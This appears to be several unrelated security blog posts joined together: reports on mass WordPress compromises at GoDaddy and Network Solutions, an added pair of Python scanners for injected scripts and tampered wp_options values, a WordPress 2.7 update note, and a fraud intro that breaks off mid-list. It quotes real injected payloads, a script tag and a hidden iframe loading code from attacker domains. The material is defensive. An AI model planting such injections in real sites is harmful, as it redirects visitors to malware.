Shared Server Blogs Hacked En Masse at GoDaddy

Google’s Online Security Blog (August 2009):

Their malware list entries have more than doubled in a single year. In that time, they have seen as many as 40,000 websites compromised in one week. However, they do admit this perceived increase may be due to improvements made in detection capabilities.

Another disturbing trend is that many compromised web properties are pointing to hundreds of different source domains. The sources of attacks appear to be widening in scope.

But still… that’s a lot of malicious code and a lot of websites.

And just last weekend, WordPress blogs hosted at GoDaddy were hit with an interesting exploit that was not immediately detectable. It seems the malicious executable only kicked in when traffic was referred from Google, which made the exploit less obvious.

The exploit action consisted of a redirect and installation of malware on computers. Some bloggers found the code when they happened to be logged in as admin. The giveaway was an unusual effect on the Dashboard layout because the malware code interfered with the CSS loading.

In view-source mode, there was a script src redirect just above the </body> tag in all the .php files, and the infected website redirected to “burnvirusnow34.xorg.pl.”

But perhaps some mild relief is found in the fact that WP databases were not affected, only the actual .php files. And a backup install prior to April 23 will restore order to your blog’s world.

However, it is not known how the hackers are accessing the hosting accounts.

Of course, GoDaddy has issued a statement regarding shared hosting security measures. But they have also stated, “The compromise of your account is outside the scope of security that we provide for you. Virus scans are performed… but they may not pick up everything… hackers tend to upload custom scripts which are not picked up by the traditional malware scanners.”

Then they make standard comments alluding to your responsibilities as a website owner.

“The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.”

A blogger posted the following at WordPress’s site regarding last weekend’s GoDaddy assault.

“My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:

<script src="http://cechirecom.com/js.php"></script>

I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I’ll probably do a clean install later.”
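A file-level check for the injection pattern described in this post, added here as an example and not taken from the original post or from GoDaddy: it flags script tags that load from an external host within a few hundred characters above </body>. The function names, the 300-character window and the placeholder host injected.example are assumptions made for the example.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# src of a <script> tag; tolerates straight or typographic quotes
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\'“”]?([^"\'“”\s>]+)', re.I)
BODY_CLOSE = re.compile(r'</body\s*>', re.I)

# Constructed sample footer; injected.example is a placeholder host
SAMPLE_FOOTER = """<?php wp_footer(); ?>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="http://injected.example/js.php"></script>
</body>
</html>
"""

def suspicious_scripts(text, allowed_hosts=frozenset(), window=300):
    """Return external script URLs found in the `window` chars above </body>."""
    hits = []
    for close in BODY_CLOSE.finditer(text):
        tail = text[max(0, close.start() - window):close.start()]
        for match in SCRIPT_SRC.finditer(tail):
            host = urlparse(match.group(1)).hostname
            # Relative URLs have no hostname and are served by the site itself
            if host and host.lower() not in allowed_hosts:
                hits.append(match.group(1))
    return hits

def scan_tree(root, allowed_hosts=frozenset()):
    """Map each .php file under `root` to the suspicious script URLs it holds."""
    results = {}
    for path in Path(root).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = suspicious_scripts(text, allowed_hosts)
        if hits:
            results[str(path)] = hits
    return results

if __name__ == "__main__":
    print(suspicious_scripts(SAMPLE_FOOTER))
```

Because the redirect only fired for visitors referred from Google, browsing the site directly would not show it; reading the files on disk does.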


Will A Back-Up Save Your Website or Blog After A Malware Attack?

Some of you may have noticed the WF has been down all day. I’m not sure why, but it’s possibly related to a second security attack on Network Solutions’ database center. The first attack occurred on or about April 8, 2010, when a mass infection of WordPress blogs was sustained at the same Network Solutions location.

Here are the details of the April 8 event:

A large number of blogs running WP 2.9.2 were infected with malware. According to Network Solutions, it seemed unrelated to themes or plugins, and some of the blogs also had wp-admin access blocked to all but a few selected IPs via htpasswd. The sole similarity was that all were shared hosts at Network Solutions. A Network Solutions spokesperson said all of their WP blogs were affected.

It appeared to be an SQL injection attack, or larger issues within Network Solutions databases, for the following reasons:

No files were created, so that would eliminate the advantages of the more common security measures. The April 8th attack modified the “siteurl” within the wp_options table to point to a particular URL. Among other things, this would completely break the layout of the site.

Here’s the code found inside blog databases:

(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),
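A check for this kind of tampering, added here as an example and not taken from the original post or from Network Solutions: it reads wp_options rows out of a SQL dump and reports any “siteurl” or “home” value that is not a plain http(s) URL. The five-column row layout is taken from the row shown above; the dump text, function names and the host injected.example are constructed for the example.

```python
import re
from urllib.parse import urlparse

# One wp_options tuple as it appears in a dump INSERT, in the column order
# of the row on this page: (id, blog_id, 'name', 'value', 'autoload')
ROW = re.compile(
    r"\(\s*\d+\s*,\s*\d+\s*,\s*'((?:[^'\\]|\\.)*)'\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\s*,\s*'(?:yes|no)'\s*\)"
)
URL_OPTIONS = {"siteurl", "home"}  # options that must hold a bare URL
FORBIDDEN = re.compile(r"""[<>"'\s]""")  # markup, quotes or whitespace

# Constructed dump fragment; injected.example is a placeholder host
SAMPLE_DUMP = r"""INSERT INTO wp_options VALUES
(1, 0, 'home', 'http://blog.example', 'yes'),
(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\"1\" src=\"http://injected.example/\"></iframe>', 'yes'),
(3, 0, 'blogname', 'My Blog', 'yes');
"""

def is_plain_url(value):
    """True only for an http(s) URL with a host and no markup characters."""
    if FORBIDDEN.search(value):
        return False
    parts = urlparse(value)
    return parts.scheme in ("http", "https") and bool(parts.hostname)

def tampered_url_options(dump_text):
    """Return (option_name, value) pairs whose URL option fails validation."""
    findings = []
    for name, raw in ROW.findall(dump_text):
        # Drop the dump's backslash escaping (enough for \" and \')
        value = re.sub(r"\\(.)", r"\1", raw)
        if name in URL_OPTIONS and not is_plain_url(value):
            findings.append((name, value))
    return findings

if __name__ == "__main__":
    for name, value in tampered_url_options(SAMPLE_DUMP):
        print(name, "->", value)
```

Running the same check on a backup before restoring it shows whether the backup itself already carries the injected value.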

Network Solutions announced today’s attack is the second in two weeks. Of course they’re doing all they can to fix the issues.

This latest attack is widespread and impacts all sites: static HTML and blogs, including WordPress and Joomla. These sites are being infected with iframe injections and encoded JavaScript, plus PDF exploits installed on certain sites. The encoded JavaScript makes the iframe injection possible.

This seems to be an attack of wider scope and heightened degree of damage.

Part of the problem for many site owners results from many hosting companies maintaining their servers with Network Solutions. So don’t think your site could never be affected if an attack of this nature occurs on someone else’s property.

Network Solutions is now admitting this latest attack is happening at a deeper level. Their restoration attempts have sometimes caused malicious software to be restored because it was backed up in their databases.

Related actions include Google announcing they are blacklisting as many affected sites as possible.

Tough day at Network Solutions.


Hello Everyone,

Since WordPress 2.7 was released on Thursday I have been looking through the system and testing it. I have installed a dummy blog for the testing and have implemented security measures on the blog to see if there can be a smooth transition from WordPress Secured v2, which was recently released.

So far everything seems to be running fine but I am doing more tests to make sure. I have got rid of the icons and created my own and put them in admin as they are much better looking. Will be spending the next few days going through some other things on the new release and will make a decision on a new release of WordPress Secured based off WordPress 2.7.

Stay Tuned for more information…

James


More and more people are attracted to the ease of online shopping and are spending higher amounts. Unfortunately, the chances of becoming a victim of Internet fraud are also increasing. The Internet National Fraud Center Watch reported that the average loss to fraud victims for just the first six months of 2005 was $2,579. This is compared to the $895 average for all of 2004. Complaints relating to general merchandise purchases (goods never received or misrepresented) accounted for 30% of Internet fraud complaints, and auction purchases (goods never received or misrepresented) topped the list at 44%.

While many e-commerce websites are reputable and have taken the necessary safety precautions to protect you, it never hurts to proceed cautiously. If you are making an online purchase, consider these easy steps:
